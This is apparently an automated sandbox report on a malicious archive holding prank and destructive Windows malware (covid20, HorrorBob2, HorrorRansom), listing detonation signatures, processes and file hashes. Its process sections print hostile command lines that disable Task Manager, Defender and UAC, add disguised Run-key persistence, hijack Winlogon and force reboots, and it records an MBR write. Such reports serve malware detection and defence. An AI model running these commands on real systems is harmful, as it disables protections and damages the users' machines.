Analysis Overview
SHA256
ceba879db245f9a04c51607671ceeb214afbf10ea12f59bbea9202f94eff65e9
Threat Level: Known bad
The file Dest.rar was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Modifies WinLogon for persistence
Possible privilege escalation attempt
Disables Task Manager via registry modification
ASPack v2.12-2.42
Modifies file permissions
Executes dropped EXE
Adds Run key to start application
Writes to the Master Boot Record (MBR)
UPX packed file
Sets desktop wallpaper using registry
Drops file in Windows directory
Unsigned PE
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Modifies data under HKEY_USERS
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Modifies registry key
Kills process with taskkill
System policy modification
Delays execution with timeout.exe
Modifies Control Panel
Modifies registry class
Suspicious use of WriteProcessMemory
Runs net.exe
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-08 14:13
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-08 14:13
Reported
2024-11-08 14:19
Platform
win11-20241007-en
Max time kernel
292s
Max time network
282s
Command Line
Signatures
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9347.tmp\CLWCP.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9347.tmp\flasher.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Control Panel\Desktop\Wallpaper = "c:\\covid20\\bg.bmp" | C:\Users\Admin\AppData\Local\Temp\9347.tmp\CLWCP.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9347.tmp\CLWCP.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9347.tmp\flasher.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe
"C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9347.tmp\covid.bat" "
C:\Users\Admin\AppData\Local\Temp\9347.tmp\CLWCP.exe
clwcp c:\covid20\bg.bmp
C:\Users\Admin\AppData\Local\Temp\9347.tmp\flasher.exe
flasher 5 c:\covid20\covid.bmp
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9347.tmp\corona.vbs"
Network
Files
memory/1976-0-0x0000000000400000-0x0000000001A7B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\9347.tmp\covid.bat
| MD5 | b08e02e536917f897acb2d21f42f0a97 |
| SHA1 | a078f1addfd3eeb0f0cb5fd206ff78e9dc0f3e45 |
| SHA256 | 2c68caeada2c251c5fc12694b7288a5790114ced4142867179e75d313efaa50c |
| SHA512 | 1d1901c3c676bb6d99a39d1a0bab1a6ee378090390bb5e7fe66cf754b8dd772ac0b79ba1215fa758445db1deac200afcc5e1e1e32b2562df946c82b530ca95ab |
C:\Users\Admin\AppData\Local\Temp\9347.tmp\bg.bmp
| MD5 | cb065726febf9c1a581f3008e678f524 |
| SHA1 | f9a0058a57213cf7ce72eddf0616a938c8f4f4b1 |
| SHA256 | d8f864128f2a79e2ff8179255ebfd06619325fec86103722b6418c3cbb41823f |
| SHA512 | b54a81cff5951b34478e777bc27cc4fd4a292b548f38162602c01e2594848e40fcfea5becfd789153c9a4fa75c354834a3a37cf3032c9857e9246bf850d24880 |
C:\Users\Admin\AppData\Local\Temp\9347.tmp\covid.bmp
| MD5 | 738bbd119d8877f8342e1ff00fe60dff |
| SHA1 | fc11d85e3c5b46bd877e06985fec1a601ce396ed |
| SHA256 | 548c9e22a04650efec06a0414d205d24600e08e0fac1beed7e8b4c03730962bb |
| SHA512 | f7a12c9a1403c9a1953387c5871d6e7865ba80c405f37c51f5c3e093bab9235b8a8ba62ad8b27f2079407e9672d47ac365c9cb08033ef349bd8c9906a30fefad |
C:\Users\Admin\AppData\Local\Temp\9347.tmp\CLWCP.exe
| MD5 | e62ee6f1efc85cb36d62ab779db6e4ec |
| SHA1 | da07ec94cf2cb2b430e15bd0c5084996a47ee649 |
| SHA256 | 13b4ec59785a1b367efb691a3d5c86eb5aaf1ca0062521c4782e1baac6633f8a |
| SHA512 | 8142086979ec1ca9675418e94326a40078400aff8587fc613e17164e034badd828e9615589e6cb8b9339da7cdc9bcb8c48e0890c5f288068f4b86ff659670a69 |
C:\Users\Admin\AppData\Local\Temp\9347.tmp\flasher.exe
| MD5 | 9254ca1da9ff8ad492ca5fa06ca181c6 |
| SHA1 | 70fa62e6232eae52467d29cf1c1dacb8a7aeab90 |
| SHA256 | 30676ad5dc94c3fec3d77d87439b2bf0a1aaa7f01900b68002a06f11caee9ce6 |
| SHA512 | a84fbbdea4e743f3e41878b9cf6db219778f1479aa478100718af9fc8d7620fc7a3295507e11df39c7863cb896f946514e50368db480796b6603c8de5580685a |
C:\Users\Admin\AppData\Local\Temp\9347.tmp\corona.vbs
| MD5 | e61624dced063c4ba5352bf487f12410 |
| SHA1 | 40bd08928900cd97f444ffaa78d93dcaf913b274 |
| SHA256 | 82ac48c4f7edbab182aa0a8c320d5616ccdd2f0e83dc733b91e45521f85462a3 |
| SHA512 | 2a27db12d2af35e7b51a307eb8860800075867922d3d63a69da608c96bec045f3c64ac757674d2a40d7f4d9e55179fc2bddc17691919e18e109a5d4669c607ac |
memory/1976-33-0x0000000000400000-0x0000000001A7B000-memory.dmp
memory/2464-34-0x0000000000400000-0x0000000000484000-memory.dmp
memory/2876-35-0x0000000000400000-0x00000000004A4000-memory.dmp
memory/2876-36-0x0000000000400000-0x00000000004A4000-memory.dmp
memory/2876-37-0x0000000000400000-0x00000000004A4000-memory.dmp
memory/2876-48-0x0000000000400000-0x00000000004A4000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-08 14:13
Reported
2024-11-08 14:14
Platform
win11-20241007-en
Max time kernel
9s
Max time network
12s
Command Line
Signatures
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Disables Task Manager via registry modification
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Acer NitroSense Update = "C:\\Service64\\Service64.exe" | C:\Windows\SysWOW64\reg.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Control Panel\Desktop\Wallpaper = "c:\\Service64\\blood.bmp" | C:\Windows\SysWOW64\reg.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "200" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe
"C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A345.tmp\HorrorBob2.bat" "
C:\Windows\SysWOW64\cscript.exe
cscript prompt.vbs
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f
C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"
C:\Windows\SysWOW64\net.exe
net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
C:\Windows\SysWOW64\shutdown.exe
shutdown /r /t 00
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3a12055 /state1:0x41c64e6d
Network
Files
memory/2884-0-0x0000000000400000-0x000000000132F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\A345.tmp\HorrorBob2.bat
| MD5 | b11c0b55dba339bbe3169584fa0eedd8 |
| SHA1 | 8c201122fd73cea5d8d2aa2aa6f7c17d99b521d9 |
| SHA256 | f73a510ebd7495f8432b489009aeed5ae7c945ccf68ec3baf88605aeefb2d073 |
| SHA512 | 8424ce9a6af67721c6df13edbfbe9e48ad1eb014e19c6952afd4158c16762cf65092e6ef459a98680673e30c86da9ba9aaf2aca309426b9237bfcf893ed40006 |
C:\Users\Admin\AppData\Local\Temp\A345.tmp\prompt.vbs
| MD5 | 52ac951762c9b42fb4492dfdde2ba4ae |
| SHA1 | 0821a0dea46432fc4db10a2dc6312d42a872ab9f |
| SHA256 | 9bc399097468bb1f2f88250cb967b3db4d34d0a7836b73f262afe2b3ad393ba3 |
| SHA512 | c91cf111b92f0f3218353e4e1700270730f2cbad54ab5d8fb368c6e87168be39f0b3e5a04d66b11bc5d93d6b4c4d03711b75e29a7af87d75c14dd296ad4ad530 |
C:\Users\Admin\AppData\Local\Temp\A345.tmp\blood.bmp
| MD5 | 040d29b801e3488f7aee3f9708128eea |
| SHA1 | 433591a971325f7529cbb7a1d16645ff65ee10c7 |
| SHA256 | fe28980c6e213619a95e5991de2062a0187fc3054418e670e1c67d3c5b6b01de |
| SHA512 | 79c64fce68a58fea469bb71dd1e10a3a2c1d4dc024635be2b8e29793bab8c34ba7afd402d47cce7826279512c7906f31fed9fe986024bc03a36dc094f7629826 |
C:\Users\Admin\AppData\Local\Temp\A345.tmp\Service64.exe
| MD5 | b53852cb556ec28efc39b986caddb791 |
| SHA1 | 5ce0819a7b1703f67272fa0f21546d0a8b2d7b0a |
| SHA256 | ae8cd9b5396770fa3c77140246365c3c501ece718b52fd6b7faed85c26b25d2a |
| SHA512 | 7da30187b939c91d045dbe9cfe8daa209d539ca865d759bde4be1c8f4f96fac5f5747ec1be1937eb00034bf531391788586c5d6c3ee93c94d88201e3a1d52599 |
memory/2884-18-0x0000000000400000-0x000000000132F000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-08 14:13
Reported
2024-11-08 14:14
Platform
win11-20241007-en
Max time kernel
4s
Max time network
7s
Command Line
Signatures
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Disables Task Manager via registry modification
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\death666 = "C:\\HostFile.exe" | C:\Windows\SysWOW64\reg.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Control Panel\Desktop\Wallpaper = "c:\\note.bmp" | C:\Windows\SysWOW64\reg.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "209" | C:\Windows\system32\LogonUI.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe
"C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\81C3.tmp\BobuxGen.cmd""
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\note.bmp /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "death666" /t REG_SZ /F /D "C:\HostFile.exe"
C:\Windows\SysWOW64\shutdown.exe
shutdown /r /t 00
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa39b3055 /state1:0x41c64e6d
Network
Files
memory/4760-0-0x0000000000400000-0x0000000000A12000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\81C3.tmp\BobuxGen.cmd
| MD5 | 47f426fb3883f2da30e9aa2a7d693fa5 |
| SHA1 | 50d843d68817717f21ba96d26a571ad996a5e35a |
| SHA256 | b1c9a35d14eec5c522fd82babfae348dc244996f75d36543347208acf6f0f85b |
| SHA512 | 2e588a0d6e2fb86e447d165d28b0600a9fe6fd670b391f70a918c333259a5b171a18837c73927c3a6de3240557b1860fe7bc616801c3dc16b9d6373c362ffacb |
C:\Users\Admin\AppData\Local\Temp\81C3.tmp\note.bmp
| MD5 | ed30c76a614ec8db5e4ac22e2929f53d |
| SHA1 | 27ab24ede0ec37cedd2cbf4d9f7135375f031fa4 |
| SHA256 | 96df16e4bef56e83f8f1106834aa23caf05972549d1c24c1f7def12e6ef4d21a |
| SHA512 | ec941a162de8fb1b32a71256ba11104775ff67424a6098e61f8d362ecc6547458e1cc4343dacd2b8df359da487d66832c2813e951d733b29803402f8206dfa8b |
C:\Users\Admin\AppData\Local\Temp\81C3.tmp\HostFile.exe
| MD5 | c875f76e521f520404401122bd82630a |
| SHA1 | 3b1c78420a55b9a768b28168753c4e22982421ef |
| SHA256 | a58caeb57da3061620dccfc374b2fba87c3061d981782d47a5dcc287e1db1d11 |
| SHA512 | b712f09c1b5fcee804da12c45e2404b265b9a18e40b9ede4f6336e3a42086e1b02bfe9ba1b5ec487251e6d96b15f5ed4a179690a8f4ae2cc36454a15f136b54b |
memory/4760-15-0x0000000000400000-0x0000000000A12000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-08 14:13
Reported
2024-11-08 14:17
Platform
win11-20241007-en
Max time kernel
219s
Max time network
202s
Command Line
Signatures
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, wscript.exe \"C:\\windows\\winbase_base_procid_none\\secureloc0x65\\WinRapistI386.vbs\"" | C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe | N/A |
Disables Task Manager via registry modification
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\783D.tmp\jeffpopup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\783D.tmp\bobcreep.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp" | C:\Windows\system32\reg.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\windows\WinAttr.gci | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | \??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | \??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe | C:\Windows\system32\cmd.exe | N/A |
